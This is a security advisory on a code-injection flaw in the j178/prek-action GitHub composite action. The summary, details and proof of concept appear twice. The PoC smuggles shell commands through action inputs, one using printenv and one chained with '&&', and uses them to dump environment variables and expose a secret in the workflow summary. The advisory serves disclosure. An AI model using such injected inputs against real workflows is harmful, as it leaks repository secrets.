Headline
GHSA-pwf7-47c3-mfhx: j178/prek-action vulnerable to arbitrary code injection in composite action
Summary
There are three potential attacks of arbitrary code injection vulnerability in the composite action at action.yml.
Details
The GitHub Action variables inputs.prek-version, inputs.extra_args, and inputs.extra-args can be used to execute arbitrary code in the context of the action.
PoC
- uses: j178/prek-action@v1.0.5
with:
prek-version: $(printenv >> $GITHUB_STEP_SUMMARY && echo "0.2.2")
extra_args: '&& echo "MY_SECRET with a character is: ${MY_SECRET:0:1}a${MY_SECRET:1}" >> $GITHUB_STEP_SUMMARY && echo ""'
env:
MY_SECRET: ${{ secrets.MY_SECRET }}
The previous example will print all the environment variables, and it will expose MY_SECRET environment variable value to the summary of the workflow. An attacker could potentially use this vector to compromise the security of the target repository, even passing unnotice because the action will run normally.
Impact
Critical, CWE-94
Summary
There are three potential attacks of arbitrary code injection vulnerability in the composite action at action.yml.
Details
The GitHub Action variables inputs.prek-version, inputs.extra_args, and inputs.extra-args can be used to execute arbitrary code in the context of the action.
PoC
- uses: j178/prek-action@v1.0.5 with: prek-version: $(printenv >> $GITHUB_STEP_SUMMARY && echo “0.2.2”) extra_args: ‘&& echo “MY_SECRET with a character is: ${MY_SECRET:0:1}a${MY_SECRET:1}” >> $GITHUB_STEP_SUMMARY && echo ""’ env: MY_SECRET: ${{ secrets.MY_SECRET }}
The previous example will print all the environment variables, and it will expose MY_SECRET environment variable value to the summary of the workflow. An attacker could potentially use this vector to compromise the security of the target repository, even passing unnotice because the action will run normally.
Impact
Critical, CWE-94
References
- GHSA-pwf7-47c3-mfhx
- j178/prek-action@6b7c6ef